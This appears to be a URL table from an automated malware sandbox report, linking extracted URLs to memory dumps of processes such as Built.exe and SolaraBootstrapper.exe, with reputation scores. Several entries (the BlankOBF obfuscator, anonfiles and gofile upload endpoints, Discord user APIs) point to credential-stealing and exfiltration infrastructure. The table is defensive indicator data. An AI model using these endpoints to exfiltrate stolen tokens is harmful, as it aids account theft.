https://github.com/Blank-c/BlankOBF	Built.exe, 00000003.00000003.1721899935.000001D5E4F9C000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1722107518.000001D5E4F9C000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1722297762.000001D5E4F9C000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1721185120.000001D5E552D000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1722439728.000001D5E4F9C000.00000004.00000020.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/solutions/industries/financial-services	SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	Built.exe, 00000003.00000003.2032723653.000001D5E551B000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/vendors-node_modules_braintree_browser-detection_dist_browser	SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/github-mark-57519b92ca4e.png	SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/vendors-node_modules_clsx_dist_clsx_m_js-node_modules_primer_	SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_mo	SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/solutions/devsecops	SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/features/code-review	SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#	Built.exe, 00000003.00000003.1703569315.000001D5E2E66000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2042088940.000001D5E4C20000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1707526751.000001D5E2E59000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1709356922.000001D5E2E59000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2041474961.000001D5E2DF1000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1703484396.000001D5E4C21000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1703747283.000001D5E2E6C000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/features	SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://user-images.githubusercontent.com/	SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.leboncoin.fr/	Built.exe, 00000003.00000002.2054526869.000001D5E586C000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64	Built.exe, 00000003.00000003.1711153853.000001D5E4CFD000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1711065402.000001D5E4CF5000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1710267778.000001D5E4E89000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1710532955.000001D5E4CBA000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2041474961.000001D5E2DF1000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_	SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/solutions/industries/manufacturing	SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.anonfiles.com/upload	Built.exe, 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/dark_dimmed-aa16bfa90fb8.css	SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.github.com/_private/browser/stats	SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/ui_packages_react-core_create-browser-history_ts-ui_packages_	SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.msn.com	Built.exe, 00000003.00000002.2054526869.000001D5E5914000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.anonfiles.com/upload-	Built.exe, 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000011.00000002.2033751444.00000269116F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1920822285.000001F310077000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://discord.com/api/v9/users/	Built.exe, 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963	Built.exe, 00000003.00000002.2053069084.000001D5E5520000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	XClient.exe, 00000006.00000002.2809336308.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.00000000029F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1868518526.0000026901681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1799627258.000001F300001000.00000004.00000800.00020000.00000000.sdmp, comReviewsession.exe, 00000026.00000002.1871672428.00000000035E1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy	Built.exe, 00000003.00000002.2054089602.000001D5E5720000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000015.00000002.1799627258.000001F300228000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000015.00000002.1799627258.000001F300228000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.githubassets.com/assets/vendors-node_modules_dompurify_dist_purify_js-89a69c248502.js	SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader	Built.exe, 00000003.00000003.1703569315.000001D5E2E66000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2042088940.000001D5E4C20000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1707526751.000001D5E2E59000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1709356922.000001D5E2E59000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2041474961.000001D5E2DF1000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1703484396.000001D5E4C21000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1703747283.000001D5E2E6C000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.amazon.com/	Built.exe, 00000003.00000002.2054526869.000001D5E586C000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000015.00000002.1920822285.000001F310077000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://docs.github.com/get-started/accessibility/keyboard-shortcuts	SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Built.exe, 00000003.00000003.2032723653.000001D5E551B000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://httpbin.org/	Built.exe, 00000003.00000002.2043351840.000001D5E4FA8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	Built.exe, 00000001.00000003.1693285558.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.cl.cam.ac.uk/~mgk25/iso-time.html	Built.exe, 00000003.00000003.1723015073.000001D5E525A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1723076390.000001D5E51D7000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1726133124.000001D5E524B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.githubassets.com/assets/element-registry-d3ba3606e12c.js	SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	Built.exe, 00000003.00000003.2032723653.000001D5E551B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/features/packages	SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000015.00000002.1799627258.000001F300228000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_ActionList_index_js	SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modu	SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535	Built.exe, 00000003.00000002.2046197420.000001D5E523A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2046197420.000001D5E5120000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://MD8.mozilla.org/1/m	Built.exe, 00000003.00000002.2054526869.000001D5E58F4000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js	SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://bugzilla.mo	Built.exe, 00000003.00000002.2054526869.000001D5E5820000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/trending	SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.anonfiles.com/uploadr	Built.exe, 00000003.00000003.1722583817.000001D5E51D7000.00000004.00000020.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tools.ietf.org/html/rfc6125#section-6.4.3	Built.exe, 00000003.00000002.2054089602.000001D5E5720000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000011.00000002.1868518526.00000269018A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1799627258.000001F300228000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://google.com/mail	Built.exe, 00000003.00000003.1837956846.000001D5E4FC7000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2043351840.000001D5E4FCA000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2043351840.000001D5E4E50000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	Built.exe, 00000003.00000002.2056924197.000001D5E5D12000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.2032955728.000001D5E533B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm	Built.exe, 00000003.00000003.1723015073.000001D5E525A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1723076390.000001D5E51D7000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1726133124.000001D5E524B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.github.com/_private/browser/errors	SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.	Built.exe, 00000003.00000003.1829183709.000001D5E525A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1856705420.000001D5E525A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2046197420.000001D5E525A000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-78ce1c87	SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.gofile.io/getServerr	Built.exe, 00000003.00000003.1722583817.000001D5E51D7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/features/discussions	SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.sectigo.com0	Built.exe, 00000001.00000003.1693285558.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.githubassets.com/assets/global-9e9ac94b9f81.css	SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/environment-bcaf5ff1a8f7.js	SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://partner.github.com	SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.githubassets.com/favicons/favicon.png	SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsN	Built.exe, 00000003.00000002.2043351840.000001D5E4FA8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://discordapp.com/api/v9/users/	Built.exe, 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/app_assets_modules_github_onfocus_ts-ui_packages_trusted-type	SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/urllib3/urllib3/issues/2920	Built.exe, 00000003.00000002.2054089602.000001D5E5720000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://account.bellmedia.c	Built.exe, 00000003.00000002.2054526869.000001D5E5914000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_focus-zone_js-	SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com(	SolaraBootstrapper.exe, 00000007.00000002.1761345082.00000000029F1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://login.microsoftonline.com	Built.exe, 00000003.00000002.2054526869.000001D5E586C000.00000004.00001000.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2054526869.000001D5E5914000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0	Built.exe, 00000001.00000003.1693285558.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.zhihu.com/	Built.exe, 00000003.00000002.2054526869.000001D5E58B4000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/features/copilot	SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.iana.org/time-zones/repository/tz-link.html	Built.exe, 00000003.00000003.1723015073.000001D5E525A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1723155170.000001D5E4FF1000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.githubassets.com/assets/dark_high_contrast-f4daad25d8cf.css	SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.githubassets.com/assets/light-efd2f2257c96.css	SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
